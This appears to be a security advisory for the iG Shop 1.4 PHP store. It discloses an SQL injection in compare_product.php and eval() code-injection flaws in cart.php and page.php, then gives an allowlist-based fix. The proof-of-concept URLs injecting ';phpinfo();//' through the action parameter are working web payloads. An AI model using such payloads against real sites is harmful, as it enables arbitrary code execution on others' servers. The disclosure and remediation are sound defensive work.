SQL injection vulnerability in compare_product.php in iGeneric iG Shop 1.4 allows remote malicious users to execute arbitrary SQL commands via the id parameter.
"If eval is the answer, then you are asking the wrong question"
--Unknown
iG Shop contains two eval() calls whose input an attacker can control through the action parameter:
127.0.0.1/ig_shop/cart.php?action=;phpinfo();//
/cart.php line 692:
eval ("cart_$action();");
127.0.0.1/ig_shop/page.php?action=;phpinfo();//
/page.php line 336:
eval ("page_$action(); ...
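A hardened form of the dispatch at cart.php line 692, as an added example that is not iG Shop's own code: the action value is checked against a fixed allowlist and the handler is called by name, so no request data is ever parsed as PHP source. The handler names cart_view and cart_add, the CART_ACTIONS list and the dispatch_cart function are hypothetical; the same pattern applies to the page_ dispatch in page.php.

```php
<?php
// Added example, not iG Shop code. cart_view/cart_add are hypothetical
// stand-ins for the application's real cart_* handlers.

function cart_view(): string { return 'view'; }
function cart_add(): string  { return 'add'; }

// Fixed allowlist: the only actions the dispatcher will ever call.
const CART_ACTIONS = ['view', 'add'];

/**
 * Replacement for eval("cart_$action();").
 * Returns the handler's result, or null when the action is rejected.
 */
function dispatch_cart($action): ?string
{
    // ?action[]=x arrives as an array; reject anything that is not a string.
    if (!is_string($action)) {
        return null;
    }
    // Strict comparison: exact match only, no type juggling.
    if (!in_array($action, CART_ACTIONS, true)) {
        return null;
    }
    $handler = 'cart_' . $action;
    // Variable-function call: the name is looked up, never evaluated as code.
    return $handler();
}

// Constructed sample inputs, including the value from the request shown above.
// In the application the argument would be $_GET['action'] ?? ''.
$samples = ['view', 'add', ';phpinfo();//', 'VIEW', ['view'], ''];
foreach ($samples as $s) {
    $result = dispatch_cart($s);
    printf(
        "%-20s => %s\n",
        json_encode($s, JSON_UNESCAPED_SLASHES),
        $result === null ? 'rejected' : $result
    );
}
```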